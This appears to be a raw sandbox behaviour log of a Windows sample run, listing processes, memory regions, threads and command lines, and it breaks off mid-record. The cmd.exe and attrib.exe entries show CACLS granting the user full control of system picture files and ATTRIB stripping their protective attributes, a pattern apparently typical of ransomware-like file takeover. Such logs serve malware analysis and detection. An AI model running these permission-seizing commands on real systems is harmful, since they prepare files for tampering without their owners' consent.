region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25471 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25472 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25473 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 25474 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25475 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25476 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25477 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25478 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 25479 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 25480 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25481 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25482 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25483 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25484 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25485 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25486 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 484 os_tid = 0xc98 Thread: id = 485 os_tid = 0xc5c Process: id = "341" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16a80" os_pid = "0xa10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "338" os_parent_pid = "0xcfc" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25487 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25488 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25489 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25490 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 25491 start_va = 0x9c0000 end_va = 0x9c6fff entry_point = 0x9c0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 25492 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25493 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25494 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25495 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 25496 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25497 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25498 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25499 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25500 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 25501 start_va = 0x5b0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 25502 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 25503 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25504 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25505 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25506 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25507 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25508 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25509 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25510 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25511 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25512 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25513 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25514 start_va = 0x190000 end_va = 0x257fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 25515 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25516 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 487 os_tid = 0xc38 Process: id = "342" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7ea16ee0" os_pid = "0xca8" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "337" os_parent_pid = "0xb88" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0006c9e7" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 25517 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25518 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25519 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25520 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25521 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25522 start_va = 0xc0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 25523 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 25524 start_va = 0x110000 end_va = 0x117fff entry_point = 0x110000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 25525 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 25526 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 25527 start_va = 0x140000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 25528 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 25529 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 25530 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 25531 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 25532 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 25533 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 25534 start_va = 0x4c0000 end_va = 0x78efff entry_point = 0x4c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 25535 start_va = 0x790000 end_va = 0x857fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 25536 start_va = 0x860000 end_va = 0x960fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 25537 start_va = 0x970000 end_va = 0xd62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 25538 start_va = 0xdb0000 end_va = 0xdeffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 25539 start_va = 0xf00000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 25540 start_va = 0x6dd80000 end_va = 0x6ddcefff entry_point = 0x6dd80000 region_type = mapped_file name = "swprv.dll" filename = "\\Windows\\System32\\swprv.dll" (normalized: "c:\\windows\\system32\\swprv.dll") Region: id = 25541 start_va = 0x6e2c0000 end_va = 0x6e2c6fff entry_point = 0x6e2c0000 region_type = mapped_file name = "fltlib.dll" filename = "\\Windows\\System32\\fltLib.dll" (normalized: "c:\\windows\\system32\\fltlib.dll") Region: id = 25542 start_va = 0x6e440000 end_va = 0x6e449fff entry_point = 0x6e440000 region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Region: id = 25543 start_va = 0x6f8f0000 end_va = 0x6f8f7fff entry_point = 0x6f8f0000 region_type = mapped_file name = "virtdisk.dll" filename = "\\Windows\\System32\\virtdisk.dll" (normalized: "c:\\windows\\system32\\virtdisk.dll") Region: id = 25544 start_va = 0x70370000 end_va = 0x7037ffff entry_point = 0x70370000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 25545 start_va = 0x738a0000 end_va = 0x738b3fff entry_point = 0x738a0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 25546 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 25547 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 25548 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 25549 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 25550 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25551 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25552 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 25553 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25554 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25555 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 25556 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25557 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25558 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25559 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25560 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 25561 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 25562 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25563 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25564 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25565 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25566 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25567 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25568 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25569 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 25570 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 25571 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 25572 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 25573 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 25574 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 25575 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25576 start_va = 0xdf0000 end_va = 0xeeffff entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 25577 start_va = 0x70380000 end_va = 0x70495fff entry_point = 0x70380000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Thread: id = 488 os_tid = 0xcac Thread: id = 489 os_tid = 0xd14 Thread: id = 490 os_tid = 0xd78 Thread: id = 491 os_tid = 0xc60 Thread: id = 492 os_tid = 0xbe8 Thread: id = 493 os_tid = 0xce8 Thread: id = 610 os_tid = 0xe30 Thread: id = 943 os_tid = 0x5d0 Process: id = "343" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xbf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25578 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25579 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25580 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25581 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 25582 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 25583 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25584 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25585 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25586 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 25587 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25588 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25589 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25590 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25591 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 25592 start_va = 0x6a0000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 25593 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 25594 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25595 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25596 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25597 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25598 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25599 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25600 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25601 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25602 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 25603 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25604 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 25605 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 25606 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 25607 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 25608 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 25609 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 25610 start_va = 0x6b0000 end_va = 0x12affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 25611 start_va = 0x12b0000 end_va = 0x1412fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012b0000" filename = "" Region: id = 25612 start_va = 0x1420000 end_va = 0x16eefff entry_point = 0x1420000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 494 os_tid = 0xbec [0181.973] GetSystemTimeAsFileTime (in: 